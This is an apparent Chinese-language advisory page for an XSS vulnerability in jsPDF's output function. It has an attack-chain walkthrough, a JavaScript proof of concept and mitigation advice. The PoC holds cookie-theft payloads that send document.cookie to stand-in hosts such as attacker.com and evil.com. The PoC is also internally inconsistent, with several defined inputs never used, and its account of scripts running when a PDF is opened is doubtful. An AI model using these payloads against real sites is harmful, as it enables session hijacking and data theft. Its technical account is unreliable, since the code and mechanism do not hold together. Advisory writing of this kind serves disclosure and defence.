CVE-2026-31938 jsPDF output函数XSS漏洞

漏洞信息

漏洞编号

CVE-2026-31938

漏洞类型

跨站脚本(XSS)

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

jsPDF

漏洞概述

jsPDF是一个纯JavaScript编写的PDF生成库，广泛应用于前端项目中。该库在4.2.1之前的版本中存在严重的跨站脚本(XSS)漏洞，源于output函数对用户控制的options参数缺乏充分的输入验证。攻击者可以通过构造恶意的output选项参数，向生成的PDF文档中注入任意HTML标签和JavaScript脚本。当受害者在其浏览器中打开包含恶意代码的PDF文件时，注入的脚本将在受害者的浏览器上下文中执行，从而允许攻击者窃取敏感信息（如Cookie、会话令牌、用户数据等）或执行恶意操作。此漏洞的CVSS评分高达9.6，属于严重级别，对使用该库的所有Web应用构成重大安全威胁。攻击者通常通过Web界面或API接口注入恶意参数，整个攻击过程无需认证，但需要一定的用户交互（如诱导用户打开PDF）。

技术细节

jsPDF库的output函数负责将生成的PDF文档以不同格式输出，该函数接受一个options参数来指定输出方式。在4.2.1之前的版本中，options参数直接传递给内部处理逻辑而未进行安全过滤。攻击者可以通过设置特定的output选项值，注入HTML标签或script标签。漏洞利用的关键在于：当用户通过浏览器打开生成的PDF文件时，嵌入的恶意脚本会被浏览器解析执行。例如，攻击者可以构造包含<script>标签或带有事件处理器的HTML元素（如<img src=x onerror=...>）的output选项。当受害者打开这个精心制作的PDF时，JavaScript代码会在与原网站相同的上下文中执行，从而绕过同源策略限制，获取完整的浏览器访问权限。攻击者利用此漏洞可实现会话劫持、敏感数据窃取、钓鱼攻击等多种恶意行为。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别使用jsPDF库(< 4.2.1版本)的Web应用，特别是那些接受用户输入并传递给output函数的应用

STEP 2

步骤2: 构造恶意Payload

攻击者构造包含XSS payload的output选项参数，如注入<script>标签或带有事件处理器的HTML元素

STEP 3

步骤3: 注入恶意输入

通过Web界面、API接口或其他输入点，将恶意构造的output选项值传递给目标应用

STEP 4

步骤4: PDF生成

应用使用jsPDF库生成包含恶意代码的PDF文档，恶意payload被嵌入到PDF内容中

STEP 5

步骤5: 诱导受害者

攻击者通过社会工程学手段诱导受害者打开或预览生成的恶意PDF文件

STEP 6

步骤6: 代码执行

当受害者的浏览器打开PDF时，注入的HTML/JavaScript代码在浏览器上下文中执行，攻击者获得敏感数据访问权限

STEP 7

步骤7: 数据窃取/进一步攻击

攻击者利用执行的脚本窃取Cookie、会话令牌、用户数据等敏感信息，或进行进一步的攻击活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-31938 PoC - jsPDF XSS via output options
// This PoC demonstrates injecting arbitrary HTML/JS through output function

// Vulnerable code pattern (jsPDF < 4.2.1)
const { jsPDF } = require('jspdf');

function generateMaliciousPDF(userProvidedOptions) {
    const doc = new jsPDF();
    doc.text('Test PDF', 10, 10);
    
    // Vulnerable: user input directly passed to output without sanitization
    const outputOptions = userProvidedOptions;
    
    // Attack vector example - inject script via output options
    const maliciousOptions = {
        fileName: 'document.pdf',
        output: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'
    };
    
    // Another attack vector - event handler injection
    const eventHandlerOptions = {
        output: '<img src=x onerror="fetch(\"https://attacker.com/exfil?data=\"+btoa(document.cookie))">'
    };
    
    // Generate PDF with malicious options
    doc.output(maliciousOptions);
    return doc;
}

// Simulated attack scenario
const attackerInput = {
    outputType: 'datauristring',
    data: '<script>document.location="https://evil.com/log?c="+document.cookie</script>'
};

// When victim opens the generated PDF, the script executes in their browser context

影响范围

jsPDF < 4.2.1

防御指南

临时缓解措施

临时缓解措施：在将用户输入传递给jsPDF的output方法之前，必须对所有参数进行严格的输入验证和HTML转义处理。建议使用白名单机制限制允许的输出选项值，拒绝任何包含HTML标签、script标签或事件处理器属性的输入。同时考虑在应用层实施额外的安全控制，如内容安全策略(CSP)头部，以减轻潜在的XSS风险。